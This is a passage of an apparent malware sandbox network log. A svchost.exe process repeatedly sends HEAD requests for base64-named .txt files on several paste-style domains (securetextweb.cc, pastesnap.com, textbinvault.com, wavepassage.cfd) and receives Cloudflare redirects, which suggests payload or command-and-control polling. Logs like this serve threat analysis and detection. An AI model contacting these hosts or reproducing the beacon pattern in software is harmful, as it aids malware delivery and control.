                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.7 | 49880 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:44.399944067 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:44.889475107 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:44 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BSqZ6aJoZpQah70MPGt0egvYStLdp%2FHW7%2FYXwHO1NBI2Ubqw82wHDpASsKSGWPFUlUnDNJNhjT0uftTmh%2F8XEDMnwvrZIvWhrIA4IeXwZoj6qumtIEBEPnR8yc0C7K%2BVTce"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36e2e4b8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.7 | 49882 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:44.571243048 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:45.056775093 CET | 870 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GdNPAt21UszN7i7LuW%2FNK%2FNuGZ3yVUxYRBRrYYbr3y%2BYNz9rsDwLk3iVuQJDZFZptI6GOKcoW4%2Br95%2ByCUtA6yKGk%2FAoXJ9TyghCO7XYva%2FGPGr8zsXfdB%2Bhuwp3lJhK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc36f48c719cb-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.7 | 49886 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:45.100444078 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:45.530103922 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2H39OcdOn2DabCtnltVgg8%2FO2Z3csqzZtBDRSGjUZElHnV2GBgy3POfH5UdQF7u0CWkYrZiizNNLgHzHEbqfI1bLWaMkZhpWxfXxNTrNogn%2BKpu8LFU3ZBLugviElamSZq5%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3723e41c42c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.7 | 49892 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:45.536559105 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.011811018 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:45 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ijtp%2BEUnOfSb%2BkjgjtZrgbkU%2BlDW5O0jGHMsJkAwGJDABCNL6BXIHqbNwtE2dt2ckVqmMRjC%2BqOtAjIezgImUquCMgpwwwgbXCkCE2U1HMhCyKjfZCkmk%2FJLfXjrojkYx86i"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37538657c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.7 | 49894 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:45.653223038 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.129633904 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qXGJHtD4iLBWTQVCjZA4hEU6ulaNchep8sFIA7%2BU32hB4H9oTXF5liaX1FOzF684p6D%2BZQirmzCxHTL4ulKQVQTz03Q3hV5i%2BH%2BxghtgJB2okcSMUXmuOk6%2F8CQFR2rCFs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc375fe01437a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.7 | 49904 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:46.136244059 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.617383003 CET | 860 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0E94SfUI8tCSYiHJDFIRI9VEktBLWO%2Bbm4KibOWu76HwGDge4oE8Ab4jWhyVF1BVgB10hTsIOR%2FWiksWHZGiyYgwxEl2rOrDHOoFWKVsKmY6PYbUsiG7STi4VE%2FHM6w"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc378f8ef42c9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.7 | 49906 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:46.481465101 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:46.957870007 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:46 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3braQ6KlQC08vpjn05mOLETwpVKyEOiyDhvjyf0sGF6jWX5f2ZnuAk2f1GqrSep2tnBsLmt7MxWyl0tDXP9XY8NVwIfDmfEoT35nkROzAp4STjN3FXz%2BxRkEauyg9XRSiR4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37b19c772a7-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.7 | 49908 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:46.624032974 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.104862928 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUhzoqEXe%2BIP2tuD9%2BgdNjEW22o1pZywjfaZDenYc%2F82RngvemayWG5kXxgMFTuEuxg%2BuUu8geWqILeRgwbh21pCCaXt4S8bgV37H9JDwKU5Yfn1aRMHY8qS3zYXACPTBByh"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37c0f6e4321-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.7 | 49915 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:46.964274883 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.419704914 CET | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8SIzCvDTZQ4j2AiUAwm2iTRKoO1EPDrnmtaIWpR90Ehsrh8xINQAoYWwLovSBS0CSAD1Skb9TUbeQN9vr0Lqw8Vw1%2FVpgV2LjF2r1qOo%2FGbGGktvaHPZvAkme7iQWnG5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37e0b200ca8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.7 | 49917 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:47.112185001 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.578442097 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaXJ%2FfJfYOMShKIVSkVMpJok5se8Yix8pmDidh57GVqchkHkfLonZnsFgNBJ1GDp7ASPUBL8EvLcT4xMyS85va0Gu79W%2F4FOgmY6riPv3CRZi9w6KmT1YRoSl2uCl7w2Rjmg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc37f0942de95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.7 | 49920 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:47.427112103 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:47.889683008 CET | 872 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:47 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gevHvOtAOM3wyYZo7Ey5exJa71MsVhvv5rD%2BFp4DnKREgA9uLAtVQcTfJcwrYVGUWOBz2BRDnvQBlDBznqxfdR%2F6hpMHtaAIGGCL5WoemCb1d9b4eOC%2F7GOTE33ebnNIuW24"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc380fa307cea-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2007&rtt_var=1003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.7 | 49929 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:47.937722921 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:48.387614965 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:48 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uktk5uaHjqhIDQbjxLdjs7N%2FWkTytKrgDc5jByzr0Mx4DBqg52VJPm6R8A49hexsKnBEtDUvmknKNOkI3mM97w5x850blKhblo2J6GlUcsg4I9YfL8HRBaOt%2FfqaX%2B1C4zFP"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38419188ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.7 | 49931 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:48.104233027 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:48.562022924 CET | 878 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:48 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fjkz0MvZuLNH2HWfRPWv9E%2FNjMBkGLRM92n11QdgeiNsjH%2BmRa8hFE0aI4DkMeEGDMOL%2FUJNSPxnfObjkLY3t%2FoIMOmL%2FQTbH9%2FLw5jHIeQGuE9jddqG0mfOFvWgCd81G7Y%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3852a697c81-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1765&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.7 | 49935 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:48.654694080 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.128067970 CET | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWVcz1m3TYcY6Y9efDlwoWYbR%2Fy3jfa4lCGWjzBFTyZLzLcXur%2BBwkvvCoG7fQUwwVMUPaGEDandRyGqQ313qfzgyIakdA1pJhBLM8nH2SLdcWJtdDciNwKyb4A9zR55"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc388ab51424c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1639&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.7 | 49943 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:49.134479046 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.595551968 CET | 880 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7emnElNfVm8u7LYCGyFIIjkn2dQ5%2FqK5gGzM7uCVfq%2BJIG9%2B%2B2CpwCyB59RSrM1aeU%2BDCRf%2BhgUWaJE0nGhVUA1ALJdY%2FcpuSWKTsERggtLCPY205dvCUxdVwuqfapZd97in"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38b9dcc4233-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2135&rtt_var=1067&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.7 | 49945 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:49.369941950 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:49.841666937 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:49 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2HkO39USwdxboF5Kpo4TMQAx9ldICZEqpdUaOsniVj4ZxektX6YY%2BDTx%2B2Y8i6kbPDmIn66808bbPuua7ffcxrU0oPCtw05%2BzvCOAjmO%2FdgmbTYavKs3ks%2FE8ttDO9UpoE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38d2f32c34f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.7 | 49947 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:49.602216005 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:50.062084913 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:50 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjVs2XzsbWBRicf7l3QIpg%2FzgHwlJAmhYJVS3KqU7KyiEp3%2BnZAhbQfY%2BP7y04uUVtbDDCTX3UPvVC8AmDip9kL1CsqhQtPZdhIel0IIlil9C0%2FojD%2F0FnAodpQsyujRK2Z1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc38e8a5142e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
